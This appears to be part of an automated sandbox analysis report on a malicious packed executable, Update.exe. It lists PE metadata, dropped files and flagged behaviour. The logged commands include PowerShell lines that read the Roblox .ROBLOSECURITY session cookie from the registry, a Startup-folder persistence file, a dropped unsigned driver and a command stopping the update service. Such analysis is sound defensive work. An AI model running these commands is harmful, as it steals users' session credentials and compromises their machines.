                    Source: Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                    Source: Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                    Source: Update.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                    Source: Update.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: Update.exe, Update.exe, 00000001.00000002.1994356570.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: Update.exe, 00000001.00000002.1986363655.00007FFDFA21C000.00000040.00000001.01000000.00000015.sdmp
                    Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: Update.exe, 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmp
                    Source: Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: Update.exe, 00000000.00000003.1661738762.0000019DCB061000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: Update.exe, Update.exe, 00000001.00000002.1994638297.00007FFE13301000.00000040.00000001.01000000.00000006.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: Update.exe, Update.exe, 00000001.00000002.1990383539.00007FFE10231000.00000040.00000001.01000000.00000011.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Update.exe
                    Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: Update.exe, 00000001.00000002.1993654455.00007FFE126EB000.00000040.00000001.01000000.00000008.sdmp
                    Source: Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: Update.exe, 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\python310.pdb source: Update.exe, 00000001.00000002.1987855894.00007FFDFB65F000.00000040.00000001.01000000.00000004.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: Update.exe, Update.exe, 00000001.00000002.1994077253.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
                    Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: Update.exe, 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: Update.exe, 00000001.00000002.1993654455.00007FFE126EB000.00000040.00000001.01000000.00000008.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: Update.exe, Update.exe, 00000001.00000002.1993393229.00007FFE11511000.00000040.00000001.01000000.00000009.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: Update.exe, Update.exe, 00000001.00000002.1989334674.00007FFE01301000.00000040.00000001.01000000.0000000B.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: Update.exe, Update.exe, 00000001.00000002.1990826986.00007FFE10251000.00000040.00000001.01000000.0000000C.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: Update.exe, Update.exe, 00000001.00000002.1991340548.00007FFE10301000.00000040.00000001.01000000.0000000A.sdmp
                    Source: Binary string: D:\a\1\b\libcrypto-1_1.pdb source: Update.exe, Update.exe, 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmp
                    Source: Binary string: D:\a\1\b\libssl-1_1.pdb source: Update.exe, Update.exe, 00000001.00000002.1986715794.00007FFDFAF56000.00000040.00000001.01000000.00000010.sdmp
                    Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: Update.exe, Update.exe, 00000001.00000002.1989991637.00007FFE0EB41000.00000040.00000001.01000000.0000000E.sdmp
                    Source: Update.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                    Source: Update.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                    Source: Update.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                    Source: Update.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                    Source: Update.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                    Data Obfuscation

                    barindex
                    Suspicious powershell command line found
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.cmdline"
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFAF91AA0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,1_2_00007FFDFAF91AA0
                    Source: libcrypto-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x118790
                    Source: python310.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x179482
                    Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x190ae
                    Source: Build.exe.15.drStatic PE information: real checksum: 0x0 should be: 0x28edbf
                    Source: libssl-1_1.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x3bfea
                    Source: Update.exeStatic PE information: real checksum: 0x826b6b should be: 0x82101c
                    Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xd20c
                    Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x16097
                    Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x14a50
                    Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x927e
                    Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1931c
                    Source: libffi-7.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x9bb1
                    Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x15162
                    Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x4d519
                    Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x15afd
                    Source: nfblozsybbjy.exe.17.drStatic PE information: real checksum: 0x0 should be: 0x28edbf
                    Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa7f83
                    Source: yidhhzbx.dll.58.drStatic PE information: real checksum: 0x0 should be: 0xe8ba
                    Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x241ea
                    Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x2099b
                    Source: libffi-7.dll.0.drStatic PE information: section name: UPX2
                    Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                    Source: Build.exe.15.drStatic PE information: section name: .00cfg
                    Source: nfblozsybbjy.exe.17.drStatic PE information: section name: .00cfg
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA1192D4 push r10; retf 1_2_00007FFDFA119340
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA11A2D5 push rsp; retf 1_2_00007FFDFA11A2D6
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA116C11 push r10; ret 1_2_00007FFDFA116C13
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA119BF2 push rsp; retf 1_2_00007FFDFA119BF3
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA11A154 push rsp; ret 1_2_00007FFDFA11A155
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA119193 push rdi; iretd 1_2_00007FFDFA119195
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA116E8B push rsi; ret 1_2_00007FFDFA116E8C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA116E7C push rsp; iretd 1_2_00007FFDFA116E7D
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA116EC0 push r12; ret 1_2_00007FFDFA116EDE
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA116EA6 push r10; retf 1_2_00007FFDFA116EA9
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA118EEE push r12; ret 1_2_00007FFDFA118F15
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA116F44 push r8; ret 1_2_00007FFDFA116F4C
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA118F43 push r12; iretd 1_2_00007FFDFA118F5A
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA116F22 push r12; ret 1_2_00007FFDFA116F3A
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA116F7D push r10; ret 1_2_00007FFDFA116F90
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA1177DA push rsi; ret 1_2_00007FFDFA117811
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA11A499 push rdx; ret 1_2_00007FFDFA11A4F0
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA116CDA push rdx; ret 1_2_00007FFDFA116CE1
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA116CBC push r8; ret 1_2_00007FFDFA116CC9
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA116CE6 push r12; ret 1_2_00007FFDFA116CE8
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA11854C push rbp; retf 1_2_00007FFDFA118565
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA118597 push r12; ret 1_2_00007FFDFA1185D3
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA119D75 push rsp; iretq 1_2_00007FFDFA119D76
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA116DEB push rsp; ret 1_2_00007FFDFA116DF3
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA118E56 push rbp; iretq 1_2_00007FFDFA118E57
                    Source: C:\Users\user\Desktop\Update.exeCode function: 1_2_00007FFDFA116E34 push rdi; iretd 1_2_00007FFDFA116E36
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9ACFD2A5 pushad ; iretd 7_2_00007FFD9ACFD2A6
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9AE183FC push ebx; ret 7_2_00007FFD9AE1847A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9AE1860B push ebx; ret 7_2_00007FFD9AE1860A
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_00007FFD9AE185FB push ebx; ret 7_2_00007FFD9AE1860A
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeCode function: 17_2_00007FF633FE1394 push qword ptr [00007FF633FEC004h]; ret 17_2_00007FF633FE1403
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1
                    Source: initial sampleStatic PE information: section name: UPX0
                    Source: initial sampleStatic PE information: section name: UPX1

                    Persistence and Installation Behavior

                    barindex
                    Sample is not signed and drops a device driver
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeFile created: C:\Windows\TEMP\jxokwqntprmq.sys
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\_lzma.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\VCRUNTIME140.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\_socket.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\_decimal.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\_hashlib.pydJump to dropped file
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeFile created: C:\Windows\Temp\jxokwqntprmq.sysJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\libssl-1_1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\libcrypto-1_1.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\_queue.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\python310.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\select.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\unicodedata.pydJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\yidhhzbx\yidhhzbx.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeFile created: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\sqlite3.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\_bz2.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeFile created: C:\Users\user\AppData\Local\Temp\lf6o4T3T.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\_ctypes.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\libffi-7.dllJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\_sqlite3.pydJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\rar.exeJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\bound.exeFile created: C:\Users\user\AppData\Local\Temp\Build.exeJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI68522\_ssl.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeFile created: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeJump to dropped file
                    Source: C:\ProgramData\bmqxekewprir\nfblozsybbjy.exeFile created: C:\Windows\Temp\jxokwqntprmq.sysJump to dropped file
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scrJump to behavior
                    Source: C:\Users\user\Desktop\Update.exeFile created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scrJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\Build.exeProcess created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop UsoSvc

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Loading BitLocker PowerShell Module
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                    Source: C:\Users\user\Desktop\Update.exeCode function: 0_2_00007FF623F776C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF623F776C0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
